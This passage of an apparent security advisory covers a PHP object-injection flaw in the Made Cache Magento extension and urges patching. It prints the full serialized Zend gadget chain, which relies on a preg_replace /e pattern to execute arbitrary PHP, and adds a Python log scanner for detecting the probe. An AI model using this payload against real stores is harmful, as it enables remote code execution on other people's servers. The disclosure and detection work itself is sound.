unserialize call. It is fixed in this commit. Attackers use the following request to find a vulnerable store:
GET /index.php/madecache/varnish/esi/?misc=<base64-encoded payload>

The base64-decoded value of the misc parameter is the following serialized PHP object (the null bytes that surround the * in protected property names are not visible here, which is why the string lengths look too long):
a:3:{s:7:"product";s:1:"1";s:6:"option";s:1:"1";s:1:"x";O:8:"Zend_Log":1:{s:11:"*_writers";a:1:{i:0;O:20:"Zend_Log_Writer_Mail":5:{s:16:"*_eventsToMail";a:1:{i:0;i:1;}s:22:"*_layoutEventsToMail";a:0:{}s:8:"*_mail";O:9:"Zend_Mail":0:{}s:10:"*_layout";O:11:"Zend_Layout":3:{s:13:"*_inflector";O:23:"Zend_Filter_PregReplace":2:{s:16:"*_matchPattern";s:7:"/(.*)/e";s:15:"*_replacement";s:14:"exit("sysmon")";}s:20:"*_inflectorEnabled";b:1;s:10:"*_layout";s:6:"layout";}s:22:"*_subjectPrependText";N;}}}}

The object chain ends in a Zend_Filter_PregReplace whose pattern /(.*)/e carries the deprecated /e modifier, so its replacement string is evaluated as PHP. Here the replacement is exit("sysmon") (another variant uses exit("MaZaYaNa")), which simply prints sysmon or MaZaYaNa before exiting. That is only the probe: once they find an unpatched store, attackers can put any PHP code in that replacement. If you use the Made Cache extension, please make sure to update it to the latest version or apply the patch from this commit.
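As an added example (not code from the original post or from the Made Cache project), the following Python scanner walks web-server access log lines and flags requests to the Made Cache ESI endpoint whose misc parameter base64-decodes to data containing a serialized PHP object; the log lines, IPs and payloads below are constructed for the demonstration, and the only detection signature assumed is PHP's O:<len>:"<Class>" object notation.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, unquote

# Constructed sample log lines (not from the original page): one benign ESI
# request carrying a plain serialized array, one carrying a serialized
# object of a Zend_ class (the shape the probe described above relies on),
# and one unrelated catalog request.
BENIGN_MISC = base64.b64encode(b'a:2:{s:7:"product";s:1:"1";s:6:"option";s:1:"1";}').decode()
SUSPECT_MISC = base64.b64encode(b'a:1:{s:1:"x";O:8:"Zend_Log":0:{}}').decode()
SAMPLE_LOG = [
    f'10.0.0.5 - - [01/Jan/2015:10:00:00 +0000] "GET /index.php/madecache/varnish/esi/?misc={BENIGN_MISC} HTTP/1.1" 200 512',
    f'10.0.0.9 - - [01/Jan/2015:10:00:01 +0000] "GET /index.php/madecache/varnish/esi/?misc={SUSPECT_MISC} HTTP/1.1" 200 12',
    '10.0.0.7 - - [01/Jan/2015:10:00:02 +0000] "GET /index.php/catalog/product/view/id/1 HTTP/1.1" 200 8192',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
ESI_PATH = "/madecache/varnish/esi/"
# A serialized PHP object is written as O:<len>:"<ClassName>":<props>:{...}
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z0-9_\\]+)"')


def misc_param(query: str):
    """Return the percent-decoded misc= value, keeping a literal '+' intact
    (parse_qs would turn '+' into a space and corrupt raw base64)."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "misc":
            return unquote(value)
    return None


def decode_misc(value: str):
    """Base64-decode the parameter; None if it is not valid base64 at all."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_line(line: str) -> str:
    """'other' for non-ESI requests, 'ok' for ESI data without objects,
    'object:<classes>' when the decoded misc contains serialized objects."""
    m = REQUEST_RE.search(line)
    if not m or ESI_PATH not in urlsplit(m.group(1)).path:
        return "other"
    misc = misc_param(urlsplit(m.group(1)).query)
    raw = decode_misc(misc) if misc is not None else None
    if raw is None:
        return "ok"
    classes = PHP_OBJECT_RE.findall(raw.decode("latin-1"))
    return "object:" + ",".join(classes) if classes else "ok"


def find_object_injections(lines):
    """Return (line, classification) for every line carrying a PHP object."""
    return [(l, c) for l in lines for c in [classify_line(l)] if c.startswith("object:")]
```

A legitimate ESI call from the extension only ever carries scalars in misc, so any decoded object is worth an alert regardless of which class it names.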